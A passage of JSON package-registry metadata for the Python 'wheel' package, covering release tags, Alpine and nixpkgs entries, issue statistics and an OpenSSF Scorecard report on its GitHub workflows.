"download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.23.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0/manifests"},{"name":"0.22.0","sha":"f1cc0b8a8601040b864e1e784e160744c7e3d965","kind":"commit","published_at":"2013-09-15T20:45:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.22.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0/manifests"},{"name":"0.21.0","sha":"474826f4d64064e852b541f099fa69dcf5dd20fa","kind":"commit","published_at":"2013-07-20T16:19:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.21.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0/manifests"},{"name":"0.16.0","sha":"f65ab72e2c6b04d10a4153807f473c9e9af421d5","kind":"commit","published_at":"2013-04-30T01:46:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.16.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"dffddb1d5af9e736fdd6192ca9256dc767bfab51","kind":"commit","published_at":"2012-11-16T14:06:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.15.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0/manifests"},{"name":"0.13.0","sha":"60fa189589155e43f33587f67eb44bb4fd7d5b58","kind":"commit","published_at":"2012-10-18T00:16:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.13.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"2861596953a6ddfb2c4f052a46a2e2b4c5619245","kind":"commit","published_at":"2012-10-06T12:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.12.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"8dd29d841e15596bc9b5d1c7f7576b2a66113f92","kind":"commit","published_at":"2012-10-06T12:18:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.11.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0/manifests"},{"name":"0.10.3","sha":"7021b0ee2a51e5d9447d06038db58e9e597625f7","kind":"commit","published_at":"2012-10-03T22:55:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3/manifests"},{"name":"0.10.2","sha":"126aaacc9f24fa69b6b74d4e742f645f6bb65cf3","kind":"commit","published_at":"2012-10-03T01:11:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2/manifests"},{"name":"0.10.1","sha":"92e52e6745ec6b1178c2f42585c2f37ab04902a8","kind":"commit","published_at":"2012-10-01T02:52:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1/manifests"},{"name":"0.10.0","sha":"9ee6da6d6cab3fa171f2704df5f934474acc4aae","kind":"commit","published_at":"2012-10-01T02:20:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0/manifests"},{"name":"0.9.7","sha":"a118f5845570ebaf6566b8075dc1dcaf117d7d43","kind":"commit","published_at":"2012-09-20T15:52:36.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7/manifests"},{"name":"0.9.6","sha":"0c4752551e4fa1d4e9786fc874ae97edf52c0369","kind":"commit","published_at":"2012-09-20T01:46:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6/manifests"},{"name":"0.9.4","sha":"8db2d0d4760a0886998e3fca4206f5db3230d223","kind":"commit","published_at":"2012-09-11T12:32:56.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4/manifests"},{"name":"0.9.3","sha":"ca65be72feaf5ebe92ef4c9e91bd722360c1ad2c","kind":"commit","published_at":"2012-09-11T02:38:10.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3/manifests"},{"name":"0.9.1","sha":"6952bc635deb0afdf36c5f325aa166636f1c2a52","kind":"commit","published_at":"2012-08-28T23:07:55.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1/manifests"},{"name":"0.9","sha":"49b1d5dac1cdeaf98998b1e5bdb0e2cf134edff3","kind":"commit","published_at":"2012-08-23T03:08:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9","html_url":"https://github.com/pypa/wheel/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9/manifests"},{"name":"0.7","sha":"b2930f5f5d3c898389bdbdd7c854a0b9d320cf14","kind":"commit","published_at":"2012-07-28T12:12:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7/manifests"},{"name":"0.6","sha":"bdf9d5747a724664bd3588ab471907a900b45c9a","kind":"commit","published_at":"2012-07-23T16:26:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6/manifests"},{"name":"0.5","sha":"d02f91dceda7c4a16cc26ea80f0eecfff638e4b2","kind":"commit","published_at":"2012-07-17T16:23:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5/manifests"}]},"repo_metadata_updated_at":"2025-10-30T04:12:44.308Z","dependent_packages_count":8,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":4.45155495677557,"stargazers_count":11.934433591557202,"forks_count":9.284832154485237,"average":6.417705175704502},"purl":"pkg:apk/alpine/py3-wheel?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.17","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-wheel/dependencies","status":null,"funding_links":["https://github.com/sponsors/pypa"],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-26T09:45:16.065Z","issues_count":109,"pull_requests_count":184,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2636588.9515151517,"issues_closed_count":98,"pull_requests_closed_count":165,"pull_request_authors_count":37,"issue_authors_count":90,"avg_comments_per_issue":5.908256880733945,"avg_comments_per_pull_request":3.5217391304347827,"merged_pull_requests_count":140,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":16,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":238596.63636363635,"past_year_avg_time_to_close_pull_request":890483.8846153846,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":15,"past_year_avg_comments_per_issue":4.25,"past_year_avg_comments_per_pull_request":3.0588235294117645,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":8,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/packages/py3-wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/packages/py3-wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/packages/py3-wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/packages/py3-wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/packages/py3-wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/packages/py3-wheel/codemeta","maintainers":[{"uuid":"alice@ayaya.dev","login":null,"name":"psykose","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=psykose","packages_count":263,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=psykose","role":null,"created_at":"2023-02-01T04:52:17.933Z","updated_at":"2023-02-01T04:52:17.933Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/maintainers/alice@ayaya.dev/packages"}],"registry":{"name":"alpine-v3.17","url":"https://pkgs.alpinelinux.org/packages?branch=v3.17","ecosystem":"alpine","default":false,"packages_count":17817,"maintainers_count":352,"namespaces_count":2,"keywords_count":3377,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1038},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.642Z","updated_at":"2026-06-10T05:19:47.280Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/namespaces"}},{"id":13091034,"name":"python312Packages.wheel","ecosystem":"nixpkgs","description":"Built-package format for Python","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":["python"],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-01T18:17:09.109Z","latest_release_published_at":"2026-02-01T18:17:09.109Z","latest_release_number":"0.45.1","last_synced_at":"2026-03-09T09:04:57.230Z","created_at":"2026-02-01T18:17:07.280Z","updated_at":"2026-03-09T11:43:09.868Z","registry_url":"https://search.nixos.org/packages?channel=24.11\u0026query=python312Packages.wheel","install_command":"nix-env -iA nixpkgs.python312Packages.wheel","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-24.11/pkgs/development/python-modules/wheel/default.nix#L35","metadata":{"nix_attribute":"python3.12-wheel-0.45.1","position":"pkgs/development/python-modules/wheel/default.nix:35","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin","i686-cygwin","x86_64-cygwin","aarch64-windows","x86_64-windows","i686-windows","i686-freebsd","x86_64-freebsd"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"],"upstream_ecosystem":"pypi","upstream_name":"wheel","upstream_purl":"pkg:pypi/wheel"},"repo_metadata":{},"repo_metadata_updated_at":null,"dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/python312Packages.wheel?channel=24.11\u0026repository_url=https://channels.nixos.org/nixos-24.11","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python312Packages.wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python312Packages.wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python312Packages.wheel/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python312Packages.wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python312Packages.wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python312Packages.wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python312Packages.wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python312Packages.wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/python312Packages.wheel/codemeta","maintainers":[{"uuid":"siriobalmelli","login":null,"name":"Sirio Balmelli","email":"sirio@b-ad.ch","url":"https://github.com/siriobalmelli","packages_count":28,"html_url":null,"role":null,"created_at":"2026-03-09T09:04:57.419Z","updated_at":"2026-03-09T09:04:57.419Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/maintainers/siriobalmelli/packages"}],"registry":{"name":"nixpkgs-24.11","url":"https://channels.nixos.org/nixos-24.11","ecosystem":"nixpkgs","default":false,"packages_count":121983,"maintainers_count":3777,"namespaces_count":0,"keywords_count":739,"github":"NixOS","metadata":{"funded_packages_count":283},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.059Z","updated_at":"2026-06-10T05:16:24.031Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/namespaces"}},{"id":11750506,"name":"py3-wheel","ecosystem":"alpine","description":"built-package format for Python","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":"main","versions_count":2,"first_release_published_at":"2025-05-05T11:24:02.000Z","latest_release_published_at":"2026-03-03T22:20:29.000Z","latest_release_number":"0.46.3-r0","last_synced_at":"2026-03-13T00:48:31.525Z","created_at":"2025-06-07T12:03:23.629Z","updated_at":"2026-03-13T00:48:31.532Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.22/main/x86_64/py3-wheel","install_command":"apk add py3-wheel","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2025-10-06T19:13:50.000Z","size":1827,"stargazers_count":539,"open_issues_count":14,"forks_count":171,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-10-30T00:35:00.752Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2025-10-29T13:00:22.000Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":68,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed 